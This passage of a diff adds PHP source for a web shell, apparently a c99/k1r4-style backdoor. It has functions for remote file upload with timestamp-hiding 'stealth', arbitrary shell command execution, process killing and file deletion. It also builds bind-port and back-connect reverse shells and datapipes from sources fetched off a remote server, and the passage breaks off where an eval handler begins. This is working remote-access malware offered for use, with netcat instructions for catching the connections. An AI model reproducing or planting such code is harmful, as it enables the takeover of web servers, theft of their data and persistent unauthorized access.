""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} + } + if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";} + else + { + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "Can't download file!<br>";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";} + else + { + fwrite($fp,$content,strlen($content)); + fclose($fp); + if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } + } + } + } + if ($miniform) + { + echo "<b>".$uploadmess."</b>"; + $act = "ls"; + } + else + { + echo "<b>File upload:</b><br><b>".$uploadmess."</b><form 
enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST> +Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br> +Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br> +Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br> +File-name (auto-fill): <input name=uploadfilename size=25><br><br> +<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br> +<input type=submit name=submit value=\"Upload\"> +</form>"; + } +} +if ($act == "delete") +{ + $delerr = ""; + foreach ($actbox as $v) + { + $result = FALSE; + $result = fs_rmobj($v); + if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";} + } + if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;} + $act = "ls"; +} +if (!$usefsbuff) +{ + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. 
For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); k1r4_sess_put($sess_data); $act = "ls"; }
+ elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); k1r4_sess_put($sess_data); $act = "ls";}
+ elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} k1r4_sess_put($sess_data); $act = "ls";}
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); k1r4_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+ $psterr = "";
+ foreach($sess_data["copy"] as $k=>$v)
+ {
+ $to = $d.basename($v);
+ if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+ if ($copy_unset) {unset($sess_data["copy"][$k]);}
+ }
+ foreach($sess_data["cut"] as $k=>$v)
+ {
+ $to = $d.basename($v);
+ if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." 
to ".$to."!<br>";}
+ unset($sess_data["cut"][$k]);
+ }
+ k1r4_sess_put($sess_data);
+ if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+ $act = "ls";
+ }
+ elseif ($actarcbuff)
+ {
+ $arcerr = "";
+ if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+ else {$ext = ".tar.gz";}
+ if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
+ $cmdline .= " ".$actarcbuff_path;
+ $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+ foreach($objects as $v)
+ {
+ $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
+ if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
+ if (is_dir($v))
+ {
+ if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
+ $v .= "*";
+ }
+ $cmdline .= " ".$v;
+ }
+ $tmp = realpath(".");
+ chdir($d);
+ $ret = myshellexec($cmdline);
+ chdir($tmp);
+ if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
+ $ret = str_replace("\r\n","\n",$ret);
+ $ret = explode("\n",$ret);
+ if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+ foreach($sess_data["cut"] as $k=>$v)
+ {
+ if (in_array($v,$ret)) {fs_rmobj($v);}
+ unset($sess_data["cut"][$k]);
+ }
+ k1r4_sess_put($sess_data);
+ if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+ $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+ $psterr = "";
+ foreach($sess_data["copy"] as $k=>$v)
+ {
+ $to = $d.basename($v);
+ if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+ if ($copy_unset) {unset($sess_data["copy"][$k]);}
+ }
+ foreach($sess_data["cut"] as $k=>$v)
+ {
+ $to = $d.basename($v);
+ if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." 
to ".$to."!<br>";}
+ unset($sess_data["cut"][$k]);
+ }
+ k1r4_sess_put($sess_data);
+ if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+ $act = "ls";
+ }
+}
+if ($act == "cmd")
+{
+if (trim($cmd) == "ps -aux") {$act = "processes";}
+elseif (trim($cmd) == "tasklist") {$act = "processes";}
+else
+{
+ @chdir($chdir);
+ if (!empty($submit))
+ {
+ echo "<b>Result of execution this command</b>:<br>";
+ $olddir = realpath(".");
+ @chdir($d);
+ $ret = myshellexec($cmd);
+ $ret = convert_cyr_string($ret,"d","w");
+ if ($cmd_txt)
+ {
+ $rows = count(explode("\r\n",$ret))+1;
+ if ($rows < 10) {$rows = 10;}
+ echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+ }
+ else {echo $ret."<br>";}
+ @chdir($olddir);
+ }
+ else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+}
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+ $list = array();
+ if ($h = @opendir($d))
+ {
+ while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
+ closedir($h);
+ }
+ else {}
+ }
+ if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";}
+ else
+ {
+ //Building array
+ $objects = array();
+ $vd = "f"; //Viewing mode
+ if ($vd == "f")
+ {
+ $objects["head"] = array();
+ $objects["folders"] = array();
+ $objects["links"] = array();
+ $objects["files"] = array();
+ foreach ($list as $v)
+ {
+ $o = basename($v);
+ $row = array();
+ if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
+ elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} 
+ elseif (is_dir($v)) + { + if (is_link($v)) {$type = "LINK";} + else {$type = "DIR";} + $row[] = $v; + $row[] = $type; + } + elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} + $row[] = filemtime($v); + if (!$win) + { + $ow = posix_getpwuid(fileowner($v)); + $gr = posix_getgrgid(filegroup($v)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); + } + $row[] = fileperms($v); + if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} + elseif (is_link($v)) {$objects["links"][] = $row;} + elseif (is_dir($v)) {$objects["folders"][] = $row;} + elseif (is_file($v)) {$objects["files"][] = $row;} + $i++; + } + $row = array(); + $row[] = "<b>Name</b>"; + $row[] = "<b>Size</b>"; + $row[] = "<b>Modify</b>"; + if (!$win) + {$row[] = "<b>Owner/Group</b>";} + $row[] = "<b>Perms</b>"; + $row[] = "<b>Action</b>"; + $parsesort = parsesort($sort); + $sort = $parsesort[0].$parsesort[1]; + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$parsesort[1] = "d";} + $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">"; + $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>"; + $row[$k] .= $y; + for($i=0;$i<count($row)-1;$i++) + { + if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";} + } + $v = $parsesort[0]; + usort($objects["folders"], "tabsort"); + usort($objects["links"], "tabsort"); + usort($objects["files"], "tabsort"); + if ($parsesort[1] == "d") + { + $objects["folders"] = array_reverse($objects["folders"]); + $objects["files"] = array_reverse($objects["files"]); + } + $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); + $tab = array(); + $tab["cols"] = array($row); + $tab["head"] = array(); + $tab["folders"] = array(); + 
$tab["links"] = array(); + $tab["files"] = array(); + $i = 0; + foreach ($objects as $a) + { + $v = $a[0]; + $o = basename($v); + $dir = dirname($v); + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";} + foreach ($regxp_highlight as $r) + { + if (ereg($r[0],$o)) + { + if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; k1r4exit();} + else + { + $r[1] = round($r[1]); + $isdir = is_dir($v); + if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) + { + if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";} + $disppath = $r[2].$disppath.$r[3]; + if ($r[4]) {break;} + } + } + } + } + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + $row = array(); + if ($o == ".") + { + $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; + $row[] = "LINK"; + } + elseif ($o == "..") + { + $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; + $row[] = "LINK"; + } + elseif (is_dir($v)) + { + if (is_link($v)) + { + $disppath .= " => ".readlink($v); + $type = "LINK"; + $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; + } + else + { + $type = "DIR"; + $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; + } + 
$row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>"; + $row[] = view_size($a[1]); + } + $row[] = date("d.m.Y H:i:s",$a[2]); + if (!$win) {$row[] = $a[3];} + $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>"; + if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;} + else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";} + if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;} + else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;} + if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} + elseif (is_link($v)) {$tab["links"][] = $row;} + elseif (is_dir($v)) {$tab["folders"][] = $row;} + elseif (is_file($v)) {$tab["files"][] = $row;} + $i++; + } + } + // Compiling table + $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); + echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." 
folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#000000 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">"; + foreach($table as $row) + { + echo "<tr>\r\n"; + foreach($row as $v) {echo "<td>".$v."</td>\r\n";} + echo "</tr>\r\n"; + } + echo "</table><hr size=\"1\" noshade><p align=\"right\"> + <script> + function ls_setcheckboxall(status) + { + var id = 1; + var num = ".(count($table)-2)."; + while (id <= num) + { + document.getElementById('actbox'+id).checked = status; + id++; + } + } + function ls_reverse_all() + { + var id = 1; + var num = ".(count($table)-2)."; + while (id <= num) + { + document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; + id++; + } + } + </script> + <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> + <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">"; + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { + echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; + } + echo "<select name=act><option value=\"".$act."\">With selected:</option>"; + echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>"; + echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>"; + if ($usefsbuff) + { + echo "<option value=cut".($dspact == "cut"?" 
selected":"").">Cut</option>"; + echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>"; + echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>"; + } + echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>"; + echo "</form>"; + } +} +if ($act == "tools") +{ + $bndportsrcs = array( + "k1r4_bindport.pl"=>array("Using PERL","perl %path %port"), + "k1r4_bindport.c"=>array("Using C","%path %port %pass") + ); + $bcsrcs = array( + "k1r4_backconn.pl"=>array("Using PERL","perl %path %host %port"), + "k1r4_backconn.c"=>array("Using C","%path %host %port") + ); + $dpsrcs = array( + "k1r4_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"), + "k1r4_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost") + ); + if (!is_array($bind)) {$bind = array();} + if (!is_array($bc)) {$bc = array();} + if (!is_array($datapipe)) {$datapipe = array();} + + if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;} + if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;} + + if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");} + if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;} + + if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";} + if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;} + if (!empty($bindsubmit)) + { + echo "<b>Result of binding port:</b><br>"; + $v = $bndportsrcs[$bind["src"]]; + if (empty($v)) {echo "Unknown file!<br>";} + elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";} + else + { + $w = explode(".",$bind["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write 
sources to \"".$srcpath."\"!<br>";} + elseif (!$data = k1r4getsource($bind["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%port",$bind["port"],$v[1]); + $v[1] = str_replace("%pass",$bind["pass"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + sleep(5); + $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5); + if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";} + else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";} + } + echo "<br>"; + } + } + if (!empty($bcsubmit)) + { + echo "<b>Result of back connection:</b><br>"; + $v = $bcsrcs[$bc["src"]]; + if (empty($v)) {echo "Unknown file!<br>";} + else + { + $w = explode(".",$bc["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";} + elseif (!$data = k1r4getsource($bc["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%host",$bc["host"],$v[1]); + $v[1] = str_replace("%port",$bc["port"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." 
> /dev/null &");
+ echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>";
+ }
+ }
+ }
+ if (!empty($dpsubmit))
+ {
+ echo "<b>Result of datapipe-running:</b><br>";
+ $v = $dpsrcs[$datapipe["src"]];
+ if (empty($v)) {echo "Unknown file!<br>";}
+ elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
+ else
+ {
+ $srcpath = $tmpdir.$datapipe["src"];
+ $w = explode(".",$datapipe["src"]);
+ $ext = $w[count($w)-1];
+ unset($w[count($w)-1]);
+ $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+ $binpath = $tmpdir.join(".",$w).rand(0,999);
+ if ($ext == "pl") {$binpath = $srcpath;}
+ @unlink($srcpath);
+ $fp = fopen($srcpath,"ab+");
+ if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+ elseif (!$data = k1r4getsource($datapipe["src"])) {echo "Can't download sources!";}
+ else
+ {
+ fwrite($fp,$data,strlen($data));
+ fclose($fp);
+ if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+ list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]);
+ $v[1] = str_replace("%path",$binpath,$v[1]);
+ $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]);
+ $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]);
+ $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]);
+ $v[1] = str_replace("//","/",$v[1]);
+ $retbind = myshellexec($v[1]." > /dev/null &");
+ sleep(5);
+ $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5);
+ if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";}
+ else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")."
".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View datapipe process</u></a></center>";}
+ }
+ echo "<br>";
+ }
+ }
+ ?><b>Binding port:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>">&nbsp;Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>">&nbsp;<select name="bind[src]"><?php
+ foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+ ?></select>&nbsp;<input type=submit name=bindsubmit value="Bind"></form>
+<b>Back connection:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>">&nbsp;Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>">&nbsp;<select name="bc[src]"><?php
+foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type=submit name=bcsubmit value="Connect"></form>
+Click "Connect" only after open port for it.
You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
+<b>Datapipe:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>">&nbsp;Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>">&nbsp;<select name="datapipe[src]"><?php
+foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.<?php
+}
+if ($act == "processes")
+{
+ echo "<b>Processes:</b><br>";
+ if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
+ else {$handler = "tasklist";}
+ $ret = myshellexec($handler);
+ if (!$ret) {echo "Can't execute \"".$handler."\"!";}
+ else
+ {
+ if (empty($processes_sort)) {$processes_sort = $sort_default;}
+ $parsesort = parsesort($processes_sort);
+ if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
+ $k = $parsesort[0];
+ if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+ else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+ $ret = htmlspecialchars($ret);
+ if (!$win)
+ {
+ if ($pid)
+ {
+ if (is_null($sig)) {$sig = 9;}
+ echo "Sending signal ".$sig." to #".$pid."...
";
+ if (posix_kill($pid,$sig)) {echo "OK.";}
+ else {echo "ERROR.";}
+ }
+ while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);}
+ $stack = explode("\n",$ret);
+ $head = explode(" ",$stack[0]);
+ unset($stack[0]);
+ for($i=0;$i<count($head);$i++)
+ {
+ if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
+ }
+ $prcs = array();
+ foreach ($stack as $line)
+ {
+ if (!empty($line))
+{
+ echo "<tr>";
+ $line = explode(" ",$line);
+ $line[10] = join(" ",array_slice($line,10));
+ $line = array_slice($line,0,11);
+ if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
+ $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+ $prcs[] = $line;
+ echo "</tr>";
+ }
+ }
+ }
+ else
+ {
+ while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
+ while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
+ while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
+ while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
+ while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
+ while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
+ while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
+ while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
+ while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
+ while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
+ while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
+ $ret = convert_cyr_string($ret,"d","w");
+ $stack = explode("\n",$ret);
+ unset($stack[0],$stack[2]);
+ $stack = array_values($stack);
+ $head = explode("",$stack[0]);
+ $head[1] = explode(" ",$head[1]);
+ $head[1] = $head[1][0];
+ $stack = array_slice($stack,1);
+ unset($head[2]);
+ $head = array_values($head);
+ if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img
src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+ else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+ if ($k > count($head)) {$k = count($head)-1;}
+ for($i=0;$i<count($head);$i++)
+ {
+ if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
+ }
+ $prcs = array();
+ foreach ($stack as $line)
+ {
+ if (!empty($line))
+ {
+ echo "<tr>";
+ $line = explode("",$line);
+ $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
+ $line[2] = intval(str_replace(" ","",$line[2]))*1024;
+ $prcs[] = $line;
+ echo "</tr>";
+ }
+ }
+ }
+ $head[$k] = "<b>".$head[$k]."</b>".$y;
+ $v = $processes_sort[0];
+ usort($prcs,"tabsort");
+ if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
+ $tab = array();
+ $tab[] = $head;
+ $tab = array_merge($tab,$prcs);
+ echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+ foreach($tab as $i=>$k)
+ {
+ echo "<tr>";
+ foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
+ echo "</tr>";
+ }
+ echo "</table>";
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+ echo "<b>Result of execution this PHP-code</b>:<br>";
+ $tmp = ob_get_contents();
